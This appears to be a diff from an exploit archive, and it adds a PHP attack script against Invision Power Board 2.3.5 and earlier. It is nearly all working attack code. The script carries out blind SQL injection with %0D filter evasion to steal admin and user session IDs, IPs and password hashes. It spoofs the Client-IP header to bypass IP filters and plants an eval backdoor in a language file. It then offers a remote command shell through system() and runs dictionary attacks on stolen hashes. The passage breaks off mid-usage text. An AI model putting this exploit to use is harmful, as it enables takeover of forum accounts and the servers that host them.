proxy($proxy,$proxyp='') - { - if(empty($proxyp)) - { - $proxarr = explode(':',$proxy); - $this->proxyhost = $proxarr[0]; - $this->proxyport = (int)$proxarr[1]; - } - else - { - $this->proxyhost = $proxy; - $this->proxyport = (int)$proxyp; - } - - if($this->proxyport > 65535) - die("Error: Invalid port number"); - } - - - /** - * This function allows you to use an - * http proxy server which requires a - * basic authentification. 
Several - * methods are supported: - * - * @access public - * @param string proxyauth ProxyUser - * @param string proxypass ProxyPass - * @example $this->proxyauth('user','pwd') - * @example $this->proxyauth('user:pwd'); - * - */ - function proxyauth($proxyauth,$proxypass='') - { - if(empty($proxypass)) - { - $posvirg = strpos($proxyauth,':'); - $this->proxyuser = substr($proxyauth,0,$posvirg); - $this->proxypass = substr($proxyauth,$posvirg+1); - } - else - { - $this->proxyuser = $proxyauth; - $this->proxypass = $proxypass; - } - } - - - /** - * This function allows you to set - * the 'User-Agent' header. - * - * @access public - * @param string useragent Agent - * @example $this->agent('Firefox') - * - */ - function agent($useragent) - { - $this->addheader('User-Agent',$useragent); - } - - - /** - * This function returns the headers - * which will be in the next request. - * - * @access public - * @return string $this->header_str Headers - * @return array $this->head Headers - * @example $this->showheader() - * @example $this->showheader(1) - * - */ - function showheader($array='') - { - $this->header_str = ''; - - if(!isset($this->header)) - return; - - if(!empty($array)) - return $this->header; - - foreach($this->header as $name => $value) - $this->header_str .= $name.': '.$value."\r\n"; - - return $this->header_str; - } - - - /** - * This function returns the cookies - * which will be in the next request. - * - * @access public - * @return string $this->cookie_str Cookies - * @return array $this->cookie Cookies - * @example $this->showcookie() - * @example $this->showcookie(1) - * - */ - function showcookie($array='') - { - if(!isset($this->cookie)) - return; - - if(!empty($array)) - return $this->cookie; - - $this->cookie_str = ''; - - foreach($this->cookie as $name => $value) - $this->cookie_str .= $name.'='.$value.'; '; - - return $this->cookie_str; - } - - - /** - * This function returns the last - * formed http request. 
- * - * @access public - * @return string $this->packet HttpPacket - * @example $this->showlastrequest() - * - */ - function showlastrequest() - { - if(!isset($this->packet)) - return; - else - return $this->packet; - } - - - /** - * This function sends the formed - * http packet with the GET method. - * - * @access public - * @param string url Url - * @return string $this->sock() - * @example $this->get('localhost/index.php?var=x') - * @example $this->get('http://localhost:88/tst.php') - * - */ - function get($url) - { - $this->target($url); - $this->method = 'get'; - return $this->sock(); - } - - - /** - * This function sends the formed - * http packet with the POST method. - * - * @access public - * @param string url Url - * @param string data PostData - * @return string $this->sock() - * @example $this->post('http://localhost/','helo=x') - * - */ - function post($url,$data) - { - $this->target($url); - $this->method = 'post'; - $this->data = $data; - return $this->sock(); - } - - - /** - * This function sends the formed http - * packet with the POST method using - * the multipart/form-data enctype. 
- * - * @access public - * @param array array FormDataArray - * @return string $this->sock() - * @example $formdata = array( - * frmdt_url => 'http://localhost/upload.php', - * frmdt_boundary => '123456', # Optional - * 'var' => 'example', - * 'file' => array( - * frmdt_type => 'image/gif', # Optional - * frmdt_transfert => 'binary' # Optional - * frmdt_filename => 'hello.php, - * frmdt_content => '')); - * $this->formdata($formdata); - * - */ - function formdata($array) - { - $this->target($array[frmdt_url]); - $this->method = 'formdata'; - $this->data = ''; - - if(!isset($array[frmdt_boundary])) - $this->boundary = 'phpsploit'; - else - $this->boundary = $array[frmdt_boundary]; - - foreach($array as $key => $value) - { - if(!preg_match('#^frmdt_(boundary|url)#',$key)) - { - $this->data .= str_repeat('-',29).$this->boundary."\r\n"; - $this->data .= 'Content-Disposition: form-data; name="'.$key.'";'; - - if(!is_array($value)) - { - $this->data .= "\r\n\r\n".$value."\r\n"; - } - else - { - $this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n"; - - if(isset($array[$key][frmdt_type])) - $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n"; - - if(isset($array[$key][frmdt_transfert])) - $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n"; - - $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; - } - } - } - - $this->data .= str_repeat('-',29).$this->boundary."--\r\n"; - return $this->sock(); - } - - - /** - * This function returns the content - * of the server response, without - * the headers. 
- * - * @access public - * @param string code ServerResponse - * @return string $this->server_content - * @example $this->getcontent() - * @example $this->getcontent($this->get('http://localhost/')) - * - */ - function getcontent($code='') - { - if(empty($code)) - $code = $this->recv; - - $code = explode("\r\n\r\n",$code); - $this->server_content = ''; - - for($i=1;$iserver_content .= $code[$i]; - - return $this->server_content; - } - - - /** - * This function returns the headers - * of the server response, without - * the content. - * - * @access public - * @param string code ServerResponse - * @return string $this->server_header - * @example $this->getcontent() - * @example $this->getcontent($this->post('http://localhost/','1=2')) - * - */ - function getheader($code='') - { - if(empty($code)) - $code = $this->recv; - - $code = explode("\r\n\r\n",$code); - $this->server_header = $code[0]; - - return $this->server_header; - } - - - /** - * This function is called by the - * cookiejar() function. It adds the - * value of the "Set-Cookie" header - * in the "Cookie" header for the - * next request. You don't have to - * call it. - * - * @access private - * @param string code ServerResponse - * - */ - function getcookie() - { - foreach(explode("\r\n",$this->getheader()) as $header) - { - if(preg_match('/set-cookie/i',$header)) - { - $fequal = strpos($header,'='); - $fvirgu = strpos($header,';'); - - // 12=strlen('set-cookie: ') - $cname = substr($header,12,$fequal-12); - $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); - - $this->cookie[trim($cname)] = trim($cvalu); - } - } - } - - - /** - * This function is called by the - * get()/post() functions. You - * don't have to call it. 
- * - * @access private - * @param string urltarg Url - * @example $this->target('http://localhost/') - * - */ - function target($urltarg) - { - if(!ereg('^http://',$urltarg)) - $urltarg = 'http://'.$urltarg; - - $urlarr = parse_url($urltarg); - - if(!isset($urlarr['path']) || empty($urlarr['path'])) - die("Error: No path precised"); - - $this->url = $urlarr['path']; - - if(isset($urlarr['query'])) - $this->url .= '?'.$urlarr['query']; - - $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80; - $this->host = $urlarr['host']; - - if($this->port != '80') - $this->host .= ':'.$this->port; - - $this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1); - - if($this->port > 65535) - die("Error: Invalid port number"); - } - - - /** - * If you call this function, - * the script will extract all - * 'Set-Cookie' headers values - * and it will automatically add - * them into the 'Cookie' header - * for all next requests. - * - * @access public - * @param integer code 1(enabled) 0(disabled) - * @example $this->cookiejar(0) - * @example $this->cookiejar(1) - * - */ - function cookiejar($code) - { - if($code=='0') - $this->cookiejar=FALSE; - - elseif($code=='1') - $this->cookiejar=TRUE; - } - - - /** - * If you call this function, - * the script will follow all - * redirections sent by the server. - * - * @access public - * @param integer code 1(enabled) 0(disabled) - * @example $this->allowredirection(0) - * @example $this->allowredirection(1) - * - */ - function allowredirection($code) - { - if($code=='0') - $this->allowredirection=FALSE; - - elseif($code=='1') - $this->allowredirection=TRUE; - } - - - /** - * This function is called if - * allowredirection() is enabled. - * You don't have to call it. 
- * - * @access private - * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection) - * @return string $this->get($this->last_redirection) - * @return string $this->recv; - * - */ - function getredirection() - { - if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr)) - { - $this->last_redirection = trim($codearr[2]); - - if(!ereg('://',$this->last_redirection)) - return $this->get('http://'.$this->host.$this->path.$this->last_redirection); - - else - return $this->get($this->last_redirection); - } - else - return $this->recv; - } - - - /** - * This function allows you - * to reset some parameters. - * - * @access public - * @param string func Param - * @example $this->reset('header') - * @example $this->reset('cookie') - * @example $this->reset() - * - */ - function reset($func='') - { - switch($func) - { - case 'header': - $this->header = array(); - break; - - case 'cookie': - $this->cookie = array(); - break; - - default: - $this->cookiejar = ''; - $this->header = array(); - $this->cookie = array(); - $this->allowredirection = ''; - break; - } - } -} - -$web = new phpsploit; -$web->cookiejar(1); -$web->agent('Mozilla Firefox'); - -$ipb = new ipb_spl; -$ipb->web =& $web; -$ipb->main(); - -?> - -# milw0rm.com [2008-08-29] +#!/usr/bin/php -q +mhead(); + + # Gimme your args + $this->p_attack = $this->get_p('attack', true); + $this->p_prox = $this->get_p('proxhost'); + $this->p_proxa = $this->get_p('proxauth'); + + $this->init_global(); + + # Proxy params + if( $this->p_prox ) + { + $this->web->proxy($this->p_prox); + + if( $this->p_proxa ) + $this->web->proxyauth($this->p_proxa); + } + + # Where do we go ? 
+ switch( $this->p_attack ) + { + case 1: $this->code_exec(); break; + case 2: $this->bf_sql_pwd(); break; + case 3: $this->bf_usr_pwd(); break; + default: $this->usage(); + } + + return; + } + + function code_exec($loop=1) + { + # First loop + if( $loop == 1 ) + { + $this->set_sql_param(); + $this->set_sql_focus(); + + $this->p_acp = $this->get_p('acp'); + + # ACP path + if( !$this->p_acp ) + { + # If the user changed the ACP directory, we can + # find it (if the "Remove ACP Link" option was not + # applied) by log in as an Admin, and then click + # on "Admin CP". This can be done with a user + # but I didn't implemented that ;) + $this->msg('Using default ACP path: admin', 1); + $this->p_acp = 'admin'; + } + else + $this->msg('Using ACP path "'.$this->p_acp.'"', 1); + + # Init client headers: + # Only if we have the same IP as the targeted user (not admin), + # it resets session datas, so we try to spoof our + # IP as a random one in order to keep user's session datas while + # we bruteforce SQL fields. + $this->bypass_matches(); + + # Remove expired sessions ( time() - 60*60*2 = > 2 hours ) + $this->web->get($this->p_url.$this->p_acp.'/index.php?'); + $this->msg('Removed all out of date admin sessions', 1); + + # Cookie prefix + $this->get_cprefix(); + } + + # Admin session ? + $this->msg('Trying to find an admin session id', 0); + + # Got one :] + if( $this->get_admin_sess() ) + { + $this->s_admin = true; + $this->s_sess = $this->data['a_sess_id']; + $this->a_url = $this->p_url.$this->p_acp.'/index.php?adsess='.$this->s_sess; + } + + # Nothing special + else + { + $this->s_admin = false; + $this->msg('No admin session id found', -1); + } + + # User session ? 
+ if( !$this->s_sess ) + { + $this->msg('Trying to find a user session id', 0); + + # Yep + if( $this->get_user_sess() ) + $this->s_sess = $this->data['u_sess_id']; + + # F0ck + else + { + $this->msg('No user session id found', -1); + $this->msg('Admin session > 2 hours or user logged out', 0); + $this->msg('Keeping trying until the user connects', 0); + $this->msg('Entering loop #'.$loop.' ...', 0); + $this->code_exec(++$loop); + } + } + + $this->msg('Getting security options', 0); + + # Security options + $this->get_sec_options(); + + # IP filter ? + if( $this->conf['ip'] === '1' ) + { + $this->s_bypass = true; + + $this->msg('IP filter option is turned on', 0); + + # Spoofing protection ? + if( !$this->conf['xforward'] ) + { + # Assuming our IP isn't the same etc.. + $this->msg('Can\'t bypass the IP filter', -1); + exit(1); + } + + # X-Forwarded-For / Client-IP / + # Proxy-User / X-Cluster-Client-IP + else + { + $this->msg('Cool, we can spoof our IP (Client-IP)', 1); + + if( $this->s_admin ) + { + $this->msg('Trying to find admin\'s last IP', 0); + + # Admin IP found + $this->get_admin_ip(); + $this->s_ip = $this->data['a_ip_addr']; + } + else + { + $this->s_admin = false; + $this->msg('Trying to find user\'s last used IP', 0); + + # User IP found + $this->get_user_ip(); + $this->s_ip = $this->data['u_ip_addr']; + } + + # Nothing found + if( !$this->s_ip ) + { + # Ahah (: + $this->msg('No IP found for this user', -1); + $this->give_hope(); + } + + # Got one ! + else + $this->msg('Ok, using IP '.$this->s_ip, 1); + } + } + + # User-Agent filter ? + if( $this->conf['browser'] === '1' && !$this->s_admin ) + { + $this->s_bypass = true; + + $this->msg('Trying to find a valid user-agent', 0); + + # Good + if( $this->get_user_agent() ) + { + $this->msg('Ok, using user-agent '.substr($this->data['u_agent'], 0, 10).'...', 1); + $this->s_agent = $this->data['u_agent']; + } + + # WTF :! 
+ else + { + $this->msg('No user-agent found for this user', -1); + $this->msg('Maybe the browser didn\'t send this header', 0); + $this->s_agent = ''; + } + + } + + # Cool !? + if( !$this->s_bypass ) + $this->msg('Cool, nothing to bypass', 1); + + $this->msg('Trying to log in', 0); + + # Owned =] + if( $this->is_logged() ) + { + # PHP code + if( $this->s_admin ) + { + $this->msg('Logged in with an admin session', 1); + $this->exec_code(); + } + + # Normal user ? + else + { + $this->msg('Logged in with a user session', 1); + $this->msg('You can log in using the cookie session_id', 1); + + if( $this->s_ip !== $this->def_ip ) + $this->msg('Set the Client-IP header to: '.$this->s_ip, 1); + + if( $this->s_agent ) + $this->msg('Set the User-Agent header to: '.$this->s_agent, 1); + + exit(0); + } + } + else + { + # Even if the admin logged out .. the admin session + # is still valid ;) + $this->msg('Can\'t log in, the session has expired ?!', -1); + $this->give_hope(); + } + + return; + } + + function bf_sql_pwd() + { + $this->p_ip = $this->get_p('ip', true); + $this->p_dict = $this->get_p('dict', true); + + $this->p_sql_u = $this->get_p('sqlusr'); + + $this->p_url = $this->get_p('url'); + $this->p_uname = $this->get_p('uname'); + $this->p_pwd = $this->get_p('pwd'); + // or + $this->p_uid = $this->get_p('uid'); + $this->p_hash = $this->get_p('passhash'); + $this->p_shold = $this->get_p('stronghold'); + + if( $this->p_uname && $this->p_pwd && $this->p_url ) + { + $this->get_cprefix(); + + $this->msg('Trying to get some cookies', 0); + + $g_dat = 'index.php?act=Login&CODE=01&CookieDate=1'; + $p_dat = 'UserName='.$this->p_uname.'&PassWord='.$this->p_pwd.'&x=0&y=0'; + + $this->web->post($this->p_url.$g_dat, $p_dat); + + $this->p_uid = $this->web->cookie[$this->s_cprefix.'member_id']; + $this->p_hash = $this->web->cookie[$this->s_cprefix.'pass_hash']; + $this->p_shold = $this->web->cookie[$this->s_cprefix.'ipb_stronghold']; + } + elseif( !$this->p_uid || !$this->p_hash || 
!$this->p_shold ) + $this->usage(); + + if( !$this->p_uid || !$this->p_hash || !$this->p_shold ) + { + $this->msg('Can\'t get cookies', -1); + $this->msg('You should try with other parameters', -1); + exit(1); + } + + $this->msg('Ok, using cookies:', 1); + + $this->msg('member_id='.$this->p_uid, 1); + $this->msg('pass_hash='.$this->p_hash, 1); + $this->msg('ipb_stronghold='.$this->p_shold, 1); + + if( !$this->p_sql_u ) + { + $this->set_sql_param(); + + $this->msg('Trying to get the current sql user', 0); + + if( !$this->get_sql_user() ) + { + $this->msg('Can\'t get the sql user', -1); + $this->msg('If you know the sql user, use -sqlusr', -1); + exit(1); + } + else + $this->p_sql_u = $this->data['sql_user']; + } + + $this->msg('Ok, using sql user '.$this->p_sql_u, 1); + + $dico_c = file($this->p_dict); + $ip_a = explode('.', $this->p_ip); + + $this->msg('Entering local dictionnary attack ('.count($dico_c).' words)', 0); + $this->msg('You should take a drink ...', 0); + + foreach( $dico_c as $line ) + { + $md5 = md5(trim($line).$this->p_sql_u); + $md5 = md5($this->p_uid.'-'.$ip_a[0].'-'.$ip_a[1].'-'.$this->p_hash).$md5; + $md5 = md5($md5); + + if( $this->p_shold === $md5 ) + { + $this->msg('Found something cool =]', 1); + $this->msg('SQL password: '.$line, 1); + exit(1); + } + + } + + $this->msg('End of the wordlist, password not found', -1); + + return; + } + + function bf_usr_pwd() + { + $this->p_dict = $this->get_p('dict', true); + + $this->p_hash = $this->get_p('passhash'); + $this->p_salt = $this->get_p('salt'); + + if( !$this->p_hash || !$this->p_salt ) + { + $this->set_sql_param(); + $this->set_sql_focus(); + } + + if( !$this->p_hash ) + { + $this->msg('Trying to get the password hash', 0); + + if( !$this->get_pass_hash() ) + { + $this->msg('Can\'t get the password hash', -1); + exit(1); + } + else + $this->p_hash = $this->data['pass_hash']; + } + + $this->msg('Ok, using hash '.$this->p_hash, 1); + + if( !$this->p_salt ) + { + $this->msg('Trying to get the 
password salt', 0); + + if( !$this->get_pass_salt() ) + { + $this->msg('Can\'t get the password salt', -1); + exit(1); + } + else + $this->p_salt = $this->data['pass_salt']; + } + + $this->msg('Ok, using salt '.$this->p_salt, 1); + + $dico_c = file($this->p_dict); + + $this->msg('Entering local dictionnary attack ('.count($dico_c).' words)', 0); + $this->msg('You should take a drink ...', 0); + + foreach( $dico_c as $line ) + { + if( $this->p_hash === md5(md5($this->p_salt).md5(trim($line))) ) + { + $this->msg('Found something cool =]', 1); + $this->msg('User password: '.$line, 1); + exit(1); + } + } + + $this->msg('End of the wordlist, password not found', -1); + + return; + } + + function set_sql_param() + { + $this->p_url = $this->get_p('url', true); + $this->p_pre = $this->get_p('prefix'); + + # Table prefix + if( !$this->p_pre ) + { + # Default table prefix if not precised + $this->msg('Using default table prefix: ibf_', 1); + $this->p_pre = 'ibf_'; + } + else + $this->msg('Using table prefix '.$this->p_pre, 1); + + } + + function set_sql_focus() + { + $this->p_uname = $this->get_p('uname'); + $this->p_uid = $this->get_p('uid'); + + if( $this->p_uname ) + $this->msg('Using targeted username '.$this->p_uname, 1); + + elseif( $this->p_uid ) + $this->msg('Using targeted user id '.$this->p_uid, 1); + + # Target + if( !($this->p_uname || $this->p_uid) ) + { + # Default uid if not precised + $this->msg('Using default user id: 1', 1); + $this->p_uid = 1; + } + + # Focus on ? 
+ if( $this->p_uname ) + $this->t_on = 'members_l_username=\''.addslashes($this->p_uname).'\''; + + else + $this->t_on = 'id='.(int)$this->p_uid; + + return; + } + + function exec_code() + { + $this->write_code(); + + while( $this->cmd_prompt() ) + { + $this->web->addheader('My-Code', $this->cmd); + $this->web->get($this->p_url); + + print "\n".$this->get_answer(); + } + + exit(0); + } + + function get_answer() + { + $res_a = explode($this->res_sep, $this->web->getcontent()); + + if( !$res_a[1] ) + return 'No result to retrieve'; + + else + return $res_a[1]; + } + + function cmd_prompt() + { + $this->cmd = $this->msg('root@ipb: ', 1, 1, 0, true); + + if( !ereg('^(quit|exit)$', $this->cmd) ) + { + $this->cmd = base64_encode($this->cmd); + $this->cmd = str_replace('%CMD%', $this->cmd, $this->php_send); + + return TRUE; + } + + else + return FALSE; + } + + function write_code() + { + # Gimme the language ID + $this->get_def_lang(); + + # Current lang settings + $p_dat = + 'code=edit2&act=lang&id='.$this->g_lid.'§ion'. + '=lookandfeel&lang_file=lang_boards.php'; + + $this->web->post($this->a_url, $p_dat); + + # We collect each variable name / value + if( preg_match_all($this->reg_lvar, $this->web->getcontent(), $l_vars) ) + { + # POST data + $p_dat = + 'code=doedit&act=lang&id='.$this->g_lid. + '&lang_file=lang_boards.php§ion=lo'. + 'okandfeel&'; + + # &Name=Value + for( $i=0; $imsg('Can\'t find block variables', 0); + exit(1); + } + + return; + } + + function get_def_lang() + { + $this->msg('Trying to get the set language id', 0); + + $this->web->get($this->a_url.'§ion=lookandfeel&act=lang'); + + if( preg_match($this->reg_lang, $this->web->getcontent(), $lids) ) + { + $this->g_lid = $lids[1]; + $this->msg('Using language id '.$this->g_lid, 1); + } + else + { + $this->msg('Can\'t get the default language id', -1); + exit(1); + } + + return; + } + + function is_logged() + { + $this->bypass_matches(); + + # User session ok ? 
+ if( !$this->s_admin )
+ {
+ $match = 'act=Login&CODE=03';
+ $this->web->addcookie($this->s_cprefix.'session_id', $this->s_sess);
+ $this->web->get($this->p_url);
+ }
+
+ # Admin session ok ?
+ else
+ {
+ $match = '§ion=';
+ $this->web->get($this->a_url);
+ }
+
+ if( preg_match("/$match/i", $this->web->getcontent()) )
+ return true;
+
+ else
+ return false;
+ }
+
+ function bypass_matches()
+ {
+ # match_browser
+ $this->web->agent($this->s_agent);
+
+ # match_ipaddress
+ $this->web->addheader('Client-IP', $this->s_ip);
+
+ return;
+ }
+
+ function get_cprefix()
+ {
+ $this->msg('Trying to get the cookie prefix', 0);
+
+ # Set-Cookie: session_id=...; path=/
+ $this->web->get($this->p_url);
+
+ $this->s_cprefix = '';
+
+ if( $this->web->cookie )
+ {
+ foreach( $this->web->cookie as $name => $value)
+ {
+ if( preg_match($this->reg_cpre, $name, $cmatches) )
+ {
+ $this->s_cprefix = $cmatches[1];
+ break;
+ }
+ }
+ }
+
+ if( !$this->s_cprefix )
+ $this->msg('No cookie prefix set', 1);
+
+ else
+ $this->msg('Using cookie prefix '.$this->s_cprefix, 1);
+
+ return;
+ }
+
+ function get_sec_options()
+ {
+ # If no value, take the default one
+ $this->get_conf('t.conf_value');
+ $this->get_conf('t.conf_default');
+
+ return;
+ }
+
+ function get_conf($field)
+ {
+ $this->init_sql();
+
+ $this->t_table = 'conf_settings';
+ $this->t_field = $field;
+ $this->t_char = $this->chr_num;
+
+ $this->t_add_0 = "AND t.conf_key='match_browser'";
+
+ if( $this->conf['browser'] === '' )
+ $this->conf['browser'] = $this->bf_inj();
+
+ $this->t_add_0 = "AND t.conf_key='match_ipaddress'";
+
+ if( $this->conf['ip'] === '' )
+ $this->conf['ip'] = $this->bf_inj();
+
+ $this->t_add_0 = "AND t.conf_key='xforward_matching'";
+
+ if( $this->conf['xforward'] === '' )
+ $this->conf['xforward'] = $this->bf_inj();
+
+ return;
+ }
+
+ function get_login_key()
+ {
+ $this->init_sql();
+
+ $this->t_key = 'login_key';
+ $this->t_table = 'members';
+ $this->t_field = 't.member_login_key';
+ $this->t_join
= 't.id=m.id';
+ $this->t_char = $this->chr_md5;
+ $this->data['login_key'] = $this->bf_inj();
+
+ return $this->key_val;
+ }
+
+ function get_sql_user()
+ {
+ $this->init_sql();
+
+ $this->t_key = 'user()';
+ $this->t_table = 'members';
+ $this->t_field = 'user()';
+ $this->t_char = $this->chr_all;
+ $this->t_end = '@';
+ $this->data['sql_user'] = $this->bf_inj();
+
+ return $this->key_val;
+ }
+
+ function get_pass_hash()
+ {
+ $this->init_sql();
+
+ $this->t_key = 'pass_hash';
+ $this->t_table = 'members_converge';
+ $this->t_field = 't.converge_pass_hash';
+ $this->t_join = 't.converge_email=m.email';
+ $this->t_char = $this->chr_md5;
+ $this->data['pass_hash'] = $this->bf_inj();
+
+ return $this->key_val;
+ }
+
+ function get_pass_salt()
+ {
+ $this->init_sql();
+
+ $this->t_key = 'pass_salt';
+ $this->t_table = 'members_converge';
+ $this->t_field = 't.converge_pass_salt';
+ $this->t_join = 't.converge_email=m.email';
+ $this->t_char = $this->chr_all;
+ $this->data['pass_salt'] = $this->bf_inj();
+
+ return $this->key_val;
+ }
+
+ function get_admin_sess()
+ {
+ $this->init_sql();
+
+ $this->t_key = 'admin_sid';
+ $this->t_table = 'admin_sessions';
+ $this->t_field = 't.session_id';
+ $this->t_join = 't.session_member_id=m.id';
+ $this->t_sel = 't.session_log_in_time';
+ $this->t_char = $this->chr_md5;
+ $this->data['a_sess_id'] = $this->bf_inj();
+
+ return $this->key_val;
+ }
+
+ function get_admin_ip()
+ {
+ $this->init_sql();
+
+ $this->t_key = 'admin_ip';
+ $this->t_table = 'admin_sessions';
+ $this->t_field = 't.session_ip_address';
+ $this->t_join = 't.session_member_id=m.id';
+ $this->t_sel = 't.session_log_in_time';
+ $this->t_char = $this->chr_ip;
+ $this->data['a_ip_addr'] = $this->bf_inj();
+
+ return $this->key_val;
+ }
+
+ function get_admin_pwd()
+ {
+ $this->init_sql();
+
+ $this->t_key = 'admin_pwd';
+ $this->t_table = 'admin_login_logs';
+ $this->t_field = 't.admin_post_details';
+ $this->t_join = 't.admin_username=m.members_l_username';
+
$this->t_sel = 't.admin_id';
+ $this->t_end = '"';
+ $this->t_bchar = -4; # ";}}
+ $this->t_char = $this->chr_all;
+ $this->data['a_pwd_like']= $this->bf_inj();
+
+ return $this->key_val;
+ }
+
+ function get_user_sess()
+ {
+ $this->init_sql();
+
+ $this->t_key = 'user_sid';
+ $this->t_table = 'sessions';
+ $this->t_field = 't.id';
+ $this->t_join = 't.member_id=m.id';
+ $this->t_sel = 't.running_time';
+ $this->t_char = $this->chr_md5;
+ $this->data['u_sess_id'] = $this->bf_inj();
+
+ return $this->key_val;
+ }
+
+ function get_user_ip()
+ {
+ $this->init_sql();
+
+ $this->t_key = 'user_ip';
+ $this->t_table = 'sessions';
+ $this->t_field = 't.ip_address';
+ $this->t_join = 't.member_id=m.id';
+ $this->t_sel = 't.running_time';
+ $this->t_char = $this->chr_ip;
+ $this->data['u_ip_addr'] = $this->bf_inj();
+
+ return $this->key_val;
+ }
+
+ function get_user_agent()
+ {
+ $this->init_sql();
+
+ $this->t_key = 'user_agent';
+ $this->t_table = 'sessions';
+ $this->t_field = 't.browser';
+ $this->t_join = 't.member_id=m.id';
+ $this->t_sel = 't.running_time';
+ $this->t_char = $this->chr_all;
+ $this->data['u_agent'] = $this->bf_inj();
+
+ return $this->key_val;
+ }
+
+ function init_sql()
+ {
+ # SQL Injection params
+ $this->t_end = null;
+ $this->t_add_0 = '';
+ $this->t_add_1 = '';
+ $this->t_sel = '1';
+ $this->t_bchar = 0;
+ $this->t_join = '';
+ $this->t_key = '';
+ $this->t_add_1 = 'ORDER BY id DESC LIMIT 1';
+
+ return;
+ }
+
+ function init_global()
+ {
+ # Charsets
+ $this->chr_spe = str_split(' :/;*(-.!,?§*µù%$£^¨=+})°]àç^_\\`è|[\'{#é~&²"@');
+ $this->chr_num = range(0, 9);
+ $this->chr_md5 = array_merge( $this->chr_num, range('a', 'f') );
+ $this->chr_ip = array_merge( $this->chr_num, array('.') );
+ $this->chr_all = array_merge( $this->chr_num, range('a', 'z') );
+ $this->chr_all = array_merge( range('A', 'Z'), $this->chr_all, $this->chr_spe );
+
+ # SQL Injection
+ $this->def_param = 'index.php?s=&act=xmlout&do=check-display-name&name=%rep_inj%';
+
+ #
IDS Evasion via %0D + $this->def_inj = "' OR 1=\"'\" U%0DNION %rep_req% OR 1=\"'\" %rep_add% #"; + + # Results + $this->data = array(); + $this->conf = array('ip' => '', 'browser' => '', 'xforward' => ''); + + # Misc + $this->stat = array(-1 => '-', 0 => '/', 1 => '+'); + $this->s_bypass = false; + $this->res_sep = md5(rand()); + $this->def_ip = rand(0,255).'.'.rand(0,255).'.'.rand(0,255).'.'.rand(0,255); + + # PHP Code + $this->php_write = '${${@eval($_SERVER[HTTP_MY_CODE])}}'; + $this->php_send = "print('$this->res_sep');@system(base64_decode('%CMD%'));"; + $this->php_send .= "print('$this->res_sep');exit(0);"; + + # Regex + $this->reg_lang = '#[\r\n]*.*[\r\n]*.*code=export&id=([0-9]+)#i'; + $this->reg_lvar = "#id='XX_([\w]+)'[\x20]+class='multitext'>(.*)</textarea>#i"; + $this->reg_cpre = '#^(.*)session_id$#'; + # $this->reg_acp = '#s_agent = 'Mozilla Firefox'; + $this->s_ip = $this->def_ip; + + return; + } + + function bf_inj() + { + $this->sub_chr = $this->t_bchar; + $this->key_val = ''; + + if( !empty($this->t_key) ) + $this->msg('', 0); + + while( true ) + { + if( $this->t_bchar < 0 ) + $this->sub_chr--; + + else + $this->sub_chr++; + + # 0-9a-f + for( $j=0;$j<=count($this->t_char);$j++ ) + { + # That one ? + $chr = $this->t_char[$j]; + + # Latest char ? + if( $j === count($this->t_char) ) + $chr = $this->t_end; + + # Ascii num + $asc = ord($chr); + + # Screen bug + if( !empty($this->t_key) ) + { + $msg = $this->t_key.'='.$this->key_val; + $msg .= ($chr === $this->t_end ? "\x20" : $chr); + + $this->msg($msg, 0, 1, 1); + } + + # Focus on the target ? + if( !empty($this->t_join) ) + { + $inj = + 'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table. + ' t, '.$this->p_pre.'members m WH%0DERE '.$this->t_join. + ' AND m.'.$this->t_on.' AND ASC%0DII(SUBS%0DTR('.$this->t_field. + ','.$this->sub_chr.',1))='.$asc.' '.$this->t_add_0; + } + else + { + $inj = + 'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table. 
+ ' t WH%0DERE ASC%0DII(SUB%0DSTR('.$this->t_field.','.$this->sub_chr.
+ ',1))='.$asc.' '.$this->t_add_0;
+ }
+
+ # SQL Injection via rawurldecode()
+ $inj = str_replace('%rep_req%', $inj, $this->def_inj);
+ $inj = str_replace('%rep_add%', $this->t_add_1, $inj);
+ $inj = str_replace(array('"', "'"), array('%2522', '%2527'), $inj);
+
+ # Params
+ $inj = str_replace('%rep_inj%', $inj, $this->def_param);
+ $inj = str_replace(array(' ', '#'), array('%20', '%23'), $inj);
+
+ $this->web->get($this->p_url.$inj);
+
+ # Ok !?
+ if( !strstr($this->web->getcontent(), 'notfound') )
+ {
+ if( $chr !== $this->t_end )
+ {
+ $this->key_val .= $chr;
+ break;
+ }
+ }
+
+ # End
+ if( $chr === $this->t_end )
+ {
+ # Reverse
+ if( $this->t_bchar < 0 )
+ $this->key_val = strrev($this->key_val);
+
+ if( !empty($this->t_key) )
+ $this->msg($this->t_key.'='.$this->key_val, 1, 1, 1);
+
+ return $this->key_val;
+ }
+ }
+ }
+
+ }
+
+ function get_p($p, $exit=false)
+ {
+ global $argv;
+
+ foreach( $argv as $key => $value )
+ {
+ if( $value === '-'.$p )
+ {
+ if( isset($argv[$key+1]) && !empty($argv[$key+1]) )
+ {
+ return $argv[$key+1];
+ }
+ else
+ {
+ if( $exit )
+ $this->usage();
+
+ return true;
+ }
+ }
+ }
+
+ if( $exit )
+ $this->usage();
+
+ return false;
+ }
+
+ function msg($msg, $nstatus, $nspace=1, $ndel=0, $ask=false)
+ {
+ if( $ndel ) $type = "\r";
+ else $type = "\n";
+
+ # wtf (:
+ print
+ (
+ $type.str_repeat("\x20", $nspace).
+ $this->stat[$nstatus]."\x20".$msg
+ );
+
+ if( $ask )
+ return trim(fgets(STDIN));
+ }
+
+ function give_hope()
+ {
+ $this->msg('You should try with another user or try another time', -1);
+
+ exit(1);
+ }
+
+ function mhead()
+ {
+ # Advisory: http://acid-root.new.fr/?0:18
+
+ print "\n Invision Power Board <= 2.3.5 Multiple Vulnerabilities";
+ print "\n ------------------------------------------------------";
+ print "\n\n About:";
+ print "\n\n by DarkFig < gmdarkfig (at) gmail (dot) com >";
+ print "\n http://acid-root.new.fr/";
+ print "\n #acidroot@irc.worldnet.net";
+ print "\n\n\n Attack(s):\n";
+
+ return;
+ }
+
+ function usage()
+ {
+
+ print "\n -attack [options]\n\n";
+ print " 1 - PHP code execution\n\n";
